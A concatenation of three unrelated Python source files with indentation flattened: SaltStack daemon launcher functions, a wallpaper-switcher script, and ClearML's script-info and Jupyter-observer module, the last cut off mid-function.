minion = salt.cli.daemons.Minion()
try:
minion.start()
except (SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.warning('Fatal functionality error caught by minion handler:\n', exc_info=True)
log.warning('** Restarting minion **')
delay = 60
if minion is not None and hasattr(minion, 'config'):
delay = minion.config.get('random_reauth_delay', 60)
delay = randint(1, delay)
log.info('waiting random_reauth_delay {0}s'.format(delay))
time.sleep(delay)
exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
def salt_minion():
'''
Start the salt minion in a subprocess.
Auto restart minion on error.
'''
import signal
import functools
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
minion = salt.cli.daemons.Minion()
minion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
minion = salt.cli.daemons.Minion()
minion.start()
return
def escalate_signal_to_process(pid, signum, sigframe): # pylint: disable=unused-argument
'''
Escalate the signal received to the multiprocessing process that
is actually running the minion
'''
# escalate signal
os.kill(pid, signum)
# keep one minion subprocess running
prev_sigint_handler = signal.getsignal(signal.SIGINT)
prev_sigterm_handler = signal.getsignal(signal.SIGTERM)
while True:
try:
process = multiprocessing.Process(target=minion_process)
process.start()
signal.signal(signal.SIGTERM,
functools.partial(escalate_signal_to_process,
process.pid))
signal.signal(signal.SIGINT,
functools.partial(escalate_signal_to_process,
process.pid))
except Exception: # pylint: disable=broad-except
# if multiprocessing does not work
minion = salt.cli.daemons.Minion()
minion.start()
break
process.join()
# Process exited or was terminated. Since we're going to try to restart
# it, we MUST, reset signal handling to the previous handlers
signal.signal(signal.SIGINT, prev_sigint_handler)
signal.signal(signal.SIGTERM, prev_sigterm_handler)
if not process.exitcode == salt.defaults.exitcodes.SALT_KEEPALIVE:
break
# ontop of the random_reauth_delay already preformed
# delay extra to reduce flooding and free resources
# NOTE: values are static but should be fine.
time.sleep(2 + randint(1, 10))
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def proxy_minion_process(queue):
'''
Start a proxy minion process
'''
import salt.cli.daemons
# salt_minion spawns this function in a new process
def suicide_when_without_parent(parent_pid):
'''
Have the minion suicide if the parent process is gone
NOTE: there is a small race issue where the parent PID could be replace
with another process with the same PID!
'''
while True:
time.sleep(5)
try:
# check pid alive (Unix only trick!)
os.kill(parent_pid, 0)
except OSError:
# forcibly exit, regular sys.exit raises an exception-- which
# isn't sufficient in a thread
os._exit(999)
if not salt.utils.is_windows():
thread = threading.Thread(target=suicide_when_without_parent, args=(os.getppid(),))
thread.start()
restart = False
proxyminion = None
try:
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
except (Exception, SaltClientError, SaltReqTimeoutError, SaltSystemExit) as exc:
log.error('Proxy Minion failed to start: ', exc_info=True)
restart = True
except SystemExit as exc:
restart = False
if restart is True:
log.warning('** Restarting proxy minion **')
delay = 60
if proxyminion is not None:
if hasattr(proxyminion, 'config'):
delay = proxyminion.config.get('random_reauth_delay', 60)
random_delay = randint(1, delay)
log.info('Sleeping random_reauth_delay of {0} seconds'.format(random_delay))
# preform delay after minion resources have been cleaned
queue.put(random_delay)
else:
queue.put(0)
def salt_proxy_minion():
'''
Start a proxy minion.
'''
import salt.cli.daemons
import multiprocessing
if '' in sys.path:
sys.path.remove('')
if salt.utils.is_windows():
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
if '--disable-keepalive' in sys.argv:
sys.argv.remove('--disable-keepalive')
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
# keep one minion subprocess running
while True:
try:
queue = multiprocessing.Queue()
except Exception:
# This breaks in containers
proxyminion = salt.cli.daemons.ProxyMinion()
proxyminion.start()
return
process = multiprocessing.Process(target=proxy_minion_process, args=(queue,))
process.start()
try:
process.join()
try:
restart_delay = queue.get(block=False)
except Exception:
if process.exitcode == 0:
# Minion process ended naturally, Ctrl+C or --version
break
restart_delay = 60
if restart_delay == 0:
# Minion process ended naturally, Ctrl+C, --version, etc.
break
# delay restart to reduce flooding and allow network resources to close
time.sleep(restart_delay)
except KeyboardInterrupt:
break
# need to reset logging because new minion objects
# cause extra log handlers to accumulate
rlogger = logging.getLogger()
for handler in rlogger.handlers:
rlogger.removeHandler(handler)
logging.basicConfig()
def salt_syndic():
'''
Start the salt syndic.
'''
import salt.cli.daemons
pid = os.getpid()
try:
syndic = salt.cli.daemons.Syndic()
syndic.start()
except KeyboardInterrupt:
os.kill(pid, 15)
def salt_key():
'''
Manage the authentication keys with salt-key.
'''
import salt.cli.key
client = None
try:
client = salt.cli.key.SaltKey()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
except Exception as err:
sys.stderr.write("Error: {0}\n".format(err.message))
def salt_cp():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.cp
client = None
try:
client = salt.cli.cp.SaltCPCli()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_call():
'''
Directly call a salt command in the modules, does not require a running
salt minion to run.
'''
import salt.cli.call
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.call.SaltCall()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_run():
'''
Execute a salt convenience routine.
'''
import salt.cli.run
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.run.SaltRun()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_ssh():
'''
Execute the salt-ssh system
'''
import salt.cli.ssh
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.ssh.SaltSSH()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
except SaltClientError as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit(err),
err,
hardcrash, trace=trace)
def salt_cloud():
'''
The main function for salt-cloud
'''
try:
import salt.cloud.cli
has_saltcloud = True
except ImportError as e:
log.error("Error importing salt cloud {0}".format(e))
# No salt cloud on Windows
has_saltcloud = False
if '' in sys.path:
sys.path.remove('')
if not has_saltcloud:
print('salt-cloud is not available in this system')
sys.exit(defaults.exitcodes.EX_UNAVAILABLE)
client = None
try:
client = cloud.cli.SaltCloud()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_api():
'''
The main function for salt-api
'''
import salt.cli.api
sapi = salt.cli.api.SaltAPI() # pylint: disable=E1120
sapi.start()
def salt_main():
'''
Publish commands to the salt system from the command line on the
master.
'''
import salt.cli.salt
if '' in sys.path:
sys.path.remove('')
client = None
try:
client = salt.cli.salt.SaltCMD()
client.run()
except KeyboardInterrupt as err:
trace = traceback.format_exc()
try:
hardcrash = client.options.hard_crash
except (AttributeError, KeyError):
hardcrash = False
_handle_interrupt(
SystemExit('\nExiting gracefully on Ctrl-c'),
err,
hardcrash, trace=trace)
def salt_spm():
'''
The main function for spm, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
import salt.cli.spm
spm = salt.cli.spm.SPM() # pylint: disable=E1120
spm.run()
|
wallpaper-switcher.py
|
import argparse
import importlib
import os
import random
import signal
import sys
import threading
import time
from collections import defaultdict
import json
import ntpath
import wallpaper_helper
img_transition = importlib.import_module("image-transition")
# TODO: add blur option
class WallpaperSwitcher:
recent_wp = defaultdict()
current_wp = ""
should_sleep = True
def __init__(self, wallpaper_folder=os.path.join(os.path.expanduser("~"), "Pictures"),
wait_time=120, transition=True,
fps_transition=20, quality_transition=100, num_of_images_transition=20, nsfw=False,
recursive=True, supported_images=None):
if supported_images is None:
supported_images = [".png", ".jpg", ".jpeg", ".bmp", ".jpg_large", ".webp"]
self.WP_FOLDER = wallpaper_folder
self.wait = wait_time
self.transition = transition
self.fps_trans = fps_transition
self.quality_tran = quality_transition
self.num_of_images_tran = num_of_images_transition
self.nsfw = nsfw
self.recursive = recursive
self.supported_images = supported_images
self.blur = False
print("-------------Settings-------------")
print("Wallpaper folder:", wallpaper_folder)
print("Delay:", wait_time)
print("Recursive:", recursive)
print("NSFW:", nsfw)
print("Transition:", transition)
print("FPS:", fps_transition)
print("Quality:", quality_transition)
print("Transition Length:", num_of_images_transition)
print("Supported Images:", supported_images)
print("-------------Settings-------------\n")
def load_history(self):
print("> Loading wallpaper history")
with open(".wallpaper-history.json", "r") as f:
data = f.read()
return json.loads(data)
def save_history(self):
with open(".wallpaper-history.json", "w") as f:
f.write(json.dumps(self.recent_wp, indent=4))
print("Saved wallpaper history")
def init_recent_wps(self):
if os.path.exists(".wallpaper-history.json"):
self.recent_wp = self.load_history()
else:
self.recent_wp = {file: float("-inf") for file in self.load_wallpapers()}
def load_wallpapers(self):
if self.recursive:
all_wallpapers = [os.path.join(dp, f) for dp, dn, fn in os.walk(self.WP_FOLDER) for f in fn
if (os.path.splitext(f)[1] in self.supported_images or not len(self.supported_images))
and not (not self.nsfw and "NSFW" in dp)]
else:
all_wallpapers = {os.path.join(self.WP_FOLDER, filename) for filename in os.listdir(self.WP_FOLDER)
if (os.path.splitext(filename)[1] in self.supported_images or
not len(self.supported_images))}
return all_wallpapers
def sort_wallpapers(self):
loaded_wallpapers = self.load_wallpapers()
print(f"\n> Loaded: {len(loaded_wallpapers)} Wallpapers")
if len(loaded_wallpapers) <= 0:
print("No Wallpapers found! Make sure that -recursive is enabled "
"or add more images to the selected directory.",
file=sys.stderr)
sys.exit()
wallpapers = {}
for filepath in loaded_wallpapers:
if filepath not in self.recent_wp:
self.recent_wp[filepath] = time.time() # New wallpaper
wallpapers[filepath] = self.recent_wp[filepath]
#print(json.dumps(sorted(wallpapers.items(), key=lambda kv: kv[1], reverse=True), indent=4))
# Items with lower values are in the back
# A lower value means an item which was picked more time ago => Last Item was picked the longest time ago
wallpapers = [x[0] for x in sorted(wallpapers.items(), key=lambda kv: kv[1], reverse=True)]
return wallpapers
def choose_wallpaper(self):
wp = self.sort_wallpapers()
distributed_wps = []
for w in wp:
distributed_wps.extend(
[w] * (wp.index(w) + 1))
# Item occurrence is calculated by its index => Higher Index => Higher Occurrence in the list => More likey to be picked
# Due to the sorting lower values are more likely to be picked
random_wp = random.choice(distributed_wps)
try:
import cv2
height, width, _ = cv2.imread(random_wp).shape
except ImportError:
height, width = None, None
except AttributeError:
print(f"Could not load image: {random_wp}.")
raise AttributeError
duplicates = sum([1 for item in distributed_wps if random_wp == item])
chance = (duplicates / len(distributed_wps)) * 100
print(
f"Random Wallpaper: {random_wp} [{width}x{height}] Chance: {chance:.2f}% : {duplicates} / {len(distributed_wps)}")
return random_wp
def favorite_wallpaper(self):
pass
def sleep(self):
print("> ", end="") # Fake input sign
self.should_sleep = True
f1 = threading.Thread(target=self.non_blocking_input)
f1.start()
t1 = time.time()
while time.time() - t1 <= self.wait and self.should_sleep:
time.sleep(1)
def non_blocking_input(self):
_input = input("").lower()
if _input in ["", "skip", "next"]:
print("Skipping Wallpaper!")
self.should_sleep = False
sys.exit(1) # Stop current thread
elif _input in ["quit", "exit"]:
print("> Exit")
self.save_history()
os.kill(os.getpid(), signal.SIGKILL) # Fucking kill it
else:
print(f"command not found: {_input}\n")
print("> ", end="", flush=True)
self.non_blocking_input()
def run(self):
self.init_recent_wps()
print(f"Desktop Environment: {wallpaper_helper.get_desktop_environment()}")
while True:
old_wallpaper = self.current_wp
try:
new_wallpaper = self.choose_wallpaper()
except AttributeError:
continue
temp_dir = os.path.join(os.path.expanduser("~"), "temp_img")
if not os.path.exists(temp_dir):
os.mkdir(temp_dir)
if self.blur:
try:
import cv2
img = cv2.imread(new_wallpaper)
img = cv2.GaussianBlur(img, (17, 17), cv2.BORDER_DEFAULT)
new_wallpaper = os.path.join(temp_dir, "blur_"+ntpath.split(new_wallpaper)[1])
cv2.imwrite(new_wallpaper, img)
except ImportError:
pass
if old_wallpaper != "" and self.transition:
try:
itrans = img_transition.ImageTransition(input_image=old_wallpaper, output_image=new_wallpaper,
temporary_dir=temp_dir,
num_of_images=self.num_of_images_tran,
quality=self.quality_tran)
except IOError:
sys.stderr.write(f"Error loading Image: {new_wallpaper} or {old_wallpaper}")
quit() # TODO: maybe some skip, need to make it properly then
self.sleep()
for image_path in itrans.transition_brightness(fps=self.fps_trans):
wallpaper_helper.set_wallpaper(image_path, False) # can safely assume set_wp works (i hope)
else:
ret = wallpaper_helper.set_wallpaper(new_wallpaper, True)
if not ret:
sys.stderr.write("Critical Error: Shutting down")
self.save_history()
quit()
self.sleep()
self.recent_wp[new_wallpaper] = time.time()
self.current_wp = new_wallpaper
def str2bool(v):
if isinstance(v, bool):
return v
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
return False
if __name__ == "__main__":
ap = argparse.ArgumentParser()
ap.add_argument("-f", "--wp_folder", required=True,
help="Folder of the Wallpapers")
ap.add_argument("-d", "--delay", default=10, type=int,
help="Delay in seconds until wallpaper switch")
ap.add_argument("-t", "--transition", type=str2bool, default=False,
help="Activates a transition between the wallpaper change")
ap.add_argument("--fps", default=20, type=int,
help="Frames Per Second for the transition")
ap.add_argument("-q", "--quality", default=100, type=int,
help="Quality of the transition images")
ap.add_argument("--len_transition", default=20, type=int,
help="Number of images used for the transition")
ap.add_argument("-nsfw", "--NSFW", default=False, type=str2bool,
help="Not Safe For Work (NSFW) images")
ap.add_argument("-r", "--recursive", default=True, type=str2bool,
help="Recursively choosing images (from all sub folders)")
ap.add_argument("-a", "--allowed_ext", default=[".png", ".jpg", ".jpeg", ".bmp", ".jpg_large", ".webp"], nargs="*",
help="Allowed Image extensions specified like thia: '.png', '.jpg'.. . No/Empty means all extensions")
args = vars(ap.parse_args())
wps = WallpaperSwitcher(wallpaper_folder=args["wp_folder"], wait_time=args["delay"], transition=args["transition"],
fps_transition=args["fps"],
quality_transition=args["quality"], num_of_images_transition=args["len_transition"],
nsfw=args["NSFW"], recursive=args["recursive"], supported_images=args["allowed_ext"])
try:
wps.run()
except KeyboardInterrupt:
wps.save_history()
sys.exit()
|
scriptinfo.py
|
import os
import sys
from copy import copy
from datetime import datetime
from functools import partial
from tempfile import mkstemp, gettempdir
import attr
import logging
import json
from pathlib2 import Path
from threading import Thread, Event
from .util import get_command_output, remove_user_pass_from_url
from ....backend_api import Session
from ....config import config
from ....debugging import get_logger
from .detectors import GitEnvDetector, GitDetector, HgEnvDetector, HgDetector, Result as DetectionResult
_logger = get_logger("Repository Detection")
class ScriptInfoError(Exception):
pass
class ScriptRequirements(object):
_max_requirements_size = 512 * 1024
_packages_remove_version = ('setuptools', )
_ignore_packages = set()
def __init__(self, root_folder):
self._root_folder = root_folder
def get_requirements(self, entry_point_filename=None):
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail
from ....utilities.pigar.__main__ import GenerateReqs
installed_pkgs = self._remove_package_versions(
get_installed_pkgs_detail(), self._packages_remove_version)
gr = GenerateReqs(save_path='', project_path=self._root_folder, installed_pkgs=installed_pkgs,
ignores=['.git', '.hg', '.idea', '__pycache__', '.ipynb_checkpoints',
'site-packages', 'dist-packages'])
reqs, try_imports, guess, local_pks = gr.extract_reqs(
module_callback=ScriptRequirements.add_trains_used_packages, entry_point_filename=entry_point_filename)
return self.create_requirements_txt(reqs, local_pks)
except Exception as ex:
_logger.warning("Failed auto-generating package requirements: {}".format(ex))
return '', ''
@staticmethod
def add_trains_used_packages(modules):
# hack: forcefully insert storage modules if we have them
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
import boto3 # noqa: F401
modules.add('boto3', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from google.cloud import storage # noqa: F401
modules.add('google_cloud_storage', 'clearml.storage', 0)
except Exception:
pass
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements,PyUnresolvedReferences
from azure.storage.blob import ContentSettings # noqa: F401
modules.add('azure_storage_blob', 'clearml.storage', 0)
except Exception:
pass
# bugfix, replace sklearn with scikit-learn name
if 'sklearn' in modules:
sklearn = modules.pop('sklearn', {})
for fname, lines in sklearn.items():
modules.add('scikit_learn', fname, lines)
# if we have torch and it supports tensorboard, we should add that as well
# (because it will not be detected automatically)
if 'torch' in modules and 'tensorboard' not in modules and 'tensorboardX' not in modules:
# noinspection PyBroadException
try:
# see if this version of torch support tensorboard
# noinspection PyPackageRequirements,PyUnresolvedReferences
import torch.utils.tensorboard # noqa: F401
# noinspection PyPackageRequirements,PyUnresolvedReferences
import tensorboard # noqa: F401
modules.add('tensorboard', 'torch', 0)
except Exception:
pass
# remove setuptools, we should not specify this module version. It is installed by default
if 'setuptools' in modules:
modules.pop('setuptools', {})
# add forced requirements:
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
for package, version in Task._force_requirements.items():
modules.add(package, 'clearml', 0)
except Exception:
pass
return modules
@staticmethod
def create_requirements_txt(reqs, local_pks=None):
# write requirements.txt
# noinspection PyBroadException
try:
conda_requirements = ''
conda_prefix = os.environ.get('CONDA_PREFIX')
if conda_prefix and not conda_prefix.endswith(os.path.sep):
conda_prefix += os.path.sep
if conda_prefix and sys.executable.startswith(conda_prefix):
conda_packages_json = get_command_output(['conda', 'list', '--json'])
conda_packages_json = json.loads(conda_packages_json)
reqs_lower = {k.lower(): (k, v) for k, v in reqs.items()}
for r in conda_packages_json:
# check if this is a pypi package, if it is, leave it outside
if not r.get('channel') or r.get('channel') == 'pypi':
continue
# check if we have it in our required packages
name = r['name'].lower()
# hack support pytorch/torch different naming convention
if name == 'pytorch':
name = 'torch'
k, v = None, None
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
else:
name = name.replace('-', '_')
if name in reqs_lower:
k, v = reqs_lower.get(name, (None, None))
if k and v is not None:
if v.version:
conda_requirements += '{0} {1} {2}\n'.format(k, '==', v.version)
else:
conda_requirements += '{0}\n'.format(k)
except Exception:
conda_requirements = ''
# add forced requirements:
forced_packages = {}
ignored_packages = ScriptRequirements._ignore_packages
# noinspection PyBroadException
try:
from ..task import Task
# noinspection PyProtectedMember
forced_packages = copy(Task._force_requirements)
# noinspection PyProtectedMember
ignored_packages = Task._ignore_requirements | ignored_packages
except Exception:
pass
# python version header
requirements_txt = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n'
if local_pks:
requirements_txt += '\n# Local modules found - skipping:\n'
for k, v in local_pks.sorted_items():
if v.version:
requirements_txt += '# {0} == {1}\n'.format(k, v.version)
else:
requirements_txt += '# {0}\n'.format(k)
# requirement summary
requirements_txt += '\n'
for k, v in reqs.sorted_items():
if k in ignored_packages or k.lower() in ignored_packages:
continue
version = v.version
if k in forced_packages:
forced_version = forced_packages.pop(k, None)
if forced_version is not None:
version = forced_version
# requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
requirements_txt += ScriptRequirements._make_req_line(k, version)
# add forced requirements that we could not find installed on the system
for k in sorted(forced_packages.keys()):
requirements_txt += ScriptRequirements._make_req_line(k, forced_packages.get(k))
requirements_txt_packages_only = \
requirements_txt + '\n# Skipping detailed import analysis, it is too large\n'
# requirements details (in comments)
requirements_txt += '\n' + \
'# Detailed import analysis\n' \
'# **************************\n'
if local_pks:
for k, v in local_pks.sorted_items():
requirements_txt += '\n'
requirements_txt += '# IMPORT LOCAL PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
for k, v in reqs.sorted_items():
requirements_txt += '\n'
if k == '-e':
requirements_txt += '# IMPORT PACKAGE {0} {1}\n'.format(k, v.version)
else:
requirements_txt += '# IMPORT PACKAGE {0}\n'.format(k)
requirements_txt += ''.join(['# {0}\n'.format(c) for c in v.comments.sorted_items()])
# make sure we do not exceed the size a size limit
return (requirements_txt if len(requirements_txt) < ScriptRequirements._max_requirements_size
else requirements_txt_packages_only,
conda_requirements)
@staticmethod
def _make_req_line(k, version):
requirements_txt = ''
if k == '-e' and version:
requirements_txt += '{0}\n'.format(version)
elif k.startswith('-e '):
requirements_txt += '{0} {1}\n'.format(k.replace('-e ', '', 1), version or '')
elif version and str(version or ' ').strip()[0].isdigit():
requirements_txt += '{0} {1} {2}\n'.format(k, '==', version)
elif version and str(version).strip():
requirements_txt += '{0} {1}\n'.format(k, version)
else:
requirements_txt += '{0}\n'.format(k)
return requirements_txt
@staticmethod
def _remove_package_versions(installed_pkgs, package_names_to_remove_version):
installed_pkgs = {k: (v[0], None if str(k) in package_names_to_remove_version else v[1])
for k, v in installed_pkgs.items()}
return installed_pkgs
class _JupyterObserver(object):
_thread = None
_exit_event = Event()
_sync_event = Event()
_sample_frequency = 30.
_first_sample_frequency = 3.
_jupyter_history_logger = None
_store_notebook_artifact = config.get('development.store_jupyter_notebook_artifact', True)
@classmethod
def observer(cls, jupyter_notebook_filename, log_history):
if cls._thread is not None:
# order of signaling is important!
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
if log_history and cls._jupyter_history_logger is None:
cls._jupyter_history_logger = _JupyterHistoryLogger()
cls._jupyter_history_logger.hook()
cls._sync_event.clear()
cls._exit_event.clear()
cls._thread = Thread(target=cls._daemon, args=(jupyter_notebook_filename, ))
cls._thread.daemon = True
cls._thread.start()
@classmethod
def signal_sync(cls, *_, **__):
cls._sync_event.set()
@classmethod
def close(cls):
if not cls._thread:
return
cls._exit_event.set()
cls._sync_event.set()
cls._thread.join()
cls._thread = None
@classmethod
def _daemon(cls, jupyter_notebook_filename):
from clearml import Task
# load jupyter notebook package
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from nbconvert.exporters.script import ScriptExporter
_script_exporter = ScriptExporter()
except Exception as ex:
_logger.warning('Could not read Jupyter Notebook: {}'.format(ex))
return
# load pigar
# noinspection PyBroadException
try:
from ....utilities.pigar.reqs import get_installed_pkgs_detail, file_import_modules
from ....utilities.pigar.modules import ReqsModules
from ....utilities.pigar.log import logger
logger.setLevel(logging.WARNING)
except Exception:
file_import_modules = None
# load IPython
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
# should not happen
get_ipython = None
# setup local notebook files
if jupyter_notebook_filename:
notebook = Path(jupyter_notebook_filename)
local_jupyter_filename = jupyter_notebook_filename
else:
notebook = None
fd, local_jupyter_filename = mkstemp(suffix='.ipynb')
os.close(fd)
last_update_ts = None
counter = 0
prev_script_hash = None
# noinspection PyBroadException
try:
from ....version import __version__
our_module = cls.__module__.split('.')[0], __version__
except Exception:
our_module = None
# noinspection PyBroadException
try:
import re
replace_ipython_pattern = re.compile(r'\n([ \t]*)get_ipython\(\)')
except Exception:
replace_ipython_pattern = None
# main observer loop, check if we need to exit
while not cls._exit_event.wait(timeout=0.):
# wait for timeout or sync event
cls._sync_event.wait(cls._sample_frequency if counter else cls._first_sample_frequency)
cls._sync_event.clear()
counter += 1
# noinspection PyBroadException
try:
# if there is no task connected, do nothing
task = Task.current_task()
if not task:
continue
script_code = None
fmodules = None
current_cell = None
# if we have a local file:
if notebook:
if not notebook.exists():
continue
# check if notebook changed
if last_update_ts is not None and notebook.stat().st_mtime - last_update_ts <= 0:
continue
last_update_ts = notebook.stat().st_mtime
else:
# serialize notebook to a temp file
if cls._jupyter_history_logger:
script_code, current_cell = cls._jupyter_history_logger.history_to_str()
else:
# noinspection PyBroadException
try:
# noinspection PyBroadException
try:
os.unlink(local_jupyter_filename)
except Exception:
pass
get_ipython().run_line_magic('history', '-t -f {}'.format(local_jupyter_filename))
with open(local_jupyter_filename, 'r') as f:
script_code = f.read()
# load the modules
from ....utilities.pigar.modules import ImportedModules
fmodules = ImportedModules()
for nm in set([str(m).split('.')[0] for m in sys.modules]):
fmodules.add(nm, 'notebook', 0)
except Exception:
continue
# get notebook python script
if script_code is None and local_jupyter_filename:
script_code, _ = _script_exporter.from_filename(local_jupyter_filename)
if cls._store_notebook_artifact:
# also upload the jupyter notebook as artifact
task.upload_artifact(
name='notebook',
artifact_object=Path(local_jupyter_filename),
preview='See `notebook preview` artifact',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
wait_on_upload=True,
)
# noinspection PyBroadException
try:
from nbconvert.exporters import HTMLExporter # noqa
html, _ = HTMLExporter().from_filename(filename=local_jupyter_filename)
local_html = Path(gettempdir()) / 'notebook_{}.html'.format(task.id)
with open(local_html.as_posix(), 'wt') as f:
f.write(html)
task.upload_artifact(
name='notebook preview', artifact_object=local_html,
preview='Click `FILE PATH` link',
metadata={'UPDATE': datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S')},
delete_after_upload=True,
wait_on_upload=True,
)
except Exception:
pass
current_script_hash = hash(script_code + (current_cell or ''))
if prev_script_hash and prev_script_hash == current_script_hash:
continue
# remove ipython direct access from the script code
# we will not be able to run them anyhow
if replace_ipython_pattern:
script_code = replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', script_code)
requirements_txt = ''
conda_requirements = ''
# parse jupyter python script and prepare pip requirements (pigar)
# if backend supports requirements
if file_import_modules and Session.check_min_api_version('2.2'):
if fmodules is None:
fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', script_code)
if current_cell:
cell_fmodules, _ = file_import_modules(
notebook.parts[-1] if notebook else 'notebook', current_cell)
# noinspection PyBroadException
try:
fmodules |= cell_fmodules
except Exception:
pass
# add current cell to the script
if current_cell:
script_code += '\n' + current_cell
fmodules = ScriptRequirements.add_trains_used_packages(fmodules)
# noinspection PyUnboundLocalVariable
installed_pkgs = get_installed_pkgs_detail()
# make sure we are in installed packages
if our_module and (our_module[0] not in installed_pkgs):
installed_pkgs[our_module[0]] = our_module
# noinspection PyUnboundLocalVariable
reqs = ReqsModules()
for name in fmodules:
if name in installed_pkgs:
pkg_name, version = installed_pkgs[name]
reqs.add(pkg_name, version, fmodules[name])
requirements_txt, conda_requirements = ScriptRequirements.create_requirements_txt(reqs)
# update script
prev_script_hash = current_script_hash
data_script = task.data.script
data_script.diff = script_code
data_script.requirements = {'pip': requirements_txt, 'conda': conda_requirements}
# noinspection PyProtectedMember
task._update_script(script=data_script)
# update requirements
# noinspection PyProtectedMember
task._update_requirements(requirements=requirements_txt)
except Exception:
pass
class ScriptInfo(object):
max_diff_size_bytes = 500000
plugins = [GitEnvDetector(), HgEnvDetector(), HgDetector(), GitDetector()]
""" Script info detection plugins, in order of priority """
@classmethod
def _jupyter_install_post_store_hook(cls, jupyter_notebook_filename, log_history=False):
# noinspection PyBroadException
try:
if 'IPython' in sys.modules:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython():
_JupyterObserver.observer(jupyter_notebook_filename, log_history)
get_ipython().events.register('pre_run_cell', _JupyterObserver.signal_sync)
if log_history:
get_ipython().events.register('post_run_cell', _JupyterObserver.signal_sync)
except Exception:
pass
@classmethod
def _get_jupyter_notebook_filename(cls):
if not (sys.argv[0].endswith(os.path.sep + 'ipykernel_launcher.py') or
sys.argv[0].endswith(os.path.join(os.path.sep, 'ipykernel', '__main__.py'))) \
or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
return None
# we can safely assume that we can import the notebook package here
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from notebook.notebookapp import list_running_servers
import requests
current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
# noinspection PyBroadException
try:
server_info = next(list_running_servers())
except Exception:
# on some jupyter notebook versions this function can crash on parsing the json file,
# we will parse it manually here
# noinspection PyPackageRequirements
import ipykernel
from glob import glob
import json
for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), '??server-*.json')):
# noinspection PyBroadException
try:
with open(f, 'r') as json_data:
server_info = json.load(json_data)
except Exception:
server_info = None
if server_info:
break
cookies = None
password = None
if server_info and server_info.get('password'):
# we need to get the password
from ....config import config
password = config.get('development.jupyter_server_password', '')
if not password:
_logger.warning(
'Password protected Jupyter Notebook server was found! '
'Add `sdk.development.jupyter_server_password=<jupyter_password>` to ~/clearml.conf')
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
r = requests.get(url=server_info['url'] + 'login')
cookies = {'_xsrf': r.cookies.get('_xsrf', '')}
r = requests.post(server_info['url'] + 'login?next', cookies=cookies,
data={'_xsrf': cookies['_xsrf'], 'password': password})
cookies.update(r.cookies)
auth_token = server_info.get('token') or os.getenv('JUPYTERHUB_API_TOKEN') or ''
try:
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), })
